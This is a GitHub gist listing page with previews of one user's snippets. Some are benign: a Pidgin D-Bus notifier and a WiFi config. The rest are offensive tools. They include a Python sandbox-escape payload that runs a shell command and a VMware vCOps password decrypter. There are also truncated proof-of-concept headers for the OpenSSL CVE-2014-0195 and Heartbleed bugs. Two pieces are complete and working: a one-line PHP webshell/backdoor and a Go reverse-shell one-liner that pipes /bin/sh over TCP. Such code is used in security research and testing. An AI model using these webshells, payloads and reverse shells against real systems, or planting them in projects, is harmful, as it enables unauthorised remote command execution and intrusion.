Skip to content

Instantly share code, notes, and snippets.

👾

takeshix takeshixx

👾
View GitHub Profile
@takeshixx
takeshixx / pidgin.py
Created Nov 3, 2015
Python D-Bus example for Pidgin
View pidgin.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
DEBUG = True
import dbus, gobject,re,pynotify
from dbus.mainloop.glib import DBusGMainLoop
dingregex = re.compile(r'(ding)',re.IGNORECASE)
def check_ding(account, sender, message, conv, flags):
sender = sender.encode('utf-8')
message = message.encode('utf-8')
obj = bus.get_object("im.pidgin.purple.PurpleService", "/im/pidgin/purple/PurpleObject")
View forkpty.c
#include <stdio.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <pty.h>
#include <termios.h>
#include <fcntl.h>
#include <sys/select.h>
@takeshixx
takeshixx / 31C3
Created Dec 27, 2014
31C3 802.1x WiFi config for netctl
View 31C3
Description='31C3 802.1x WiFi'
Interface=wlp4s0
Connection=wireless
Security=wpa-configsection
IP=dhcp
WPAConfigSection=(
'ssid="31C3"'
'key_mgmt=WPA-EAP'
'eap=TTLS'
'identity="randomusername"'
View gist:ba2b3af5226eea6b1d14
{}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os').system('id')
@takeshixx
takeshixx / vcops-passwords.py
Created Aug 12, 2014
VMware vCenter Operations Manager password de/encrypter
View vcops-passwords.py
#!/usr/bin/env python2
# VMware vCenter Operations Manager password de/encrypter
# author: takeshix@adversec.com
from sys import argv,exit
from base64 import b64encode,b64decode
from Crypto.Cipher import AES
class vCopsCrypt:
# AES128 wrapper class with PKCS5 padding
BLOCK_SIZE = 16
View CVE-2014-0195.py
#!/usr/bin/env python2
#
# OpenSSL heap overflow PoC
# Found by ZDI - ZDI-14-173 // CVE-2014-0195
# PoC by @_hugsy_
#
# Ref: https://tools.ietf.org/html/rfc6347
#
import socket, struct
@takeshixx
takeshixx / gist:11264187
Created Apr 24, 2014
Parse jail parameters from FreeBSD /etc/rc.conf file (and all included files)
View gist:11264187
from sh import sh
dict(_.split('=',1) for _ in [_ for _ in sh('-c','\n'.join([_.strip() for _ in open('/etc/rc.conf').read().split('\n') if not _.startswith('#') and _ is not ''])+'\nset').split('\n') if _.startswith('jail_')])
@takeshixx
takeshixx / hb-test.py
Last active Jun 10, 2020
OpenSSL heartbeat PoC with STARTTLS support.
View hb-test.py
#!/usr/bin/env python2
"""
Author: takeshix <takeshix@adversec.com>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford (jspenguin@jspenguin.org).
Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
"""
import sys,struct,socket
from argparse import ArgumentParser
@takeshixx
takeshixx / shell.php
Created Apr 5, 2014
PHP webshell/backdoor
View shell.php
// Call: http://localhost/shell.php?f=system&c=id
<?@extract($_REQUEST);@die($f($c));?>
@takeshixx
takeshixx / shell.go
Last active Oct 30, 2018
Golang reverse shell
View shell.go
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go
You can’t perform that action at this time.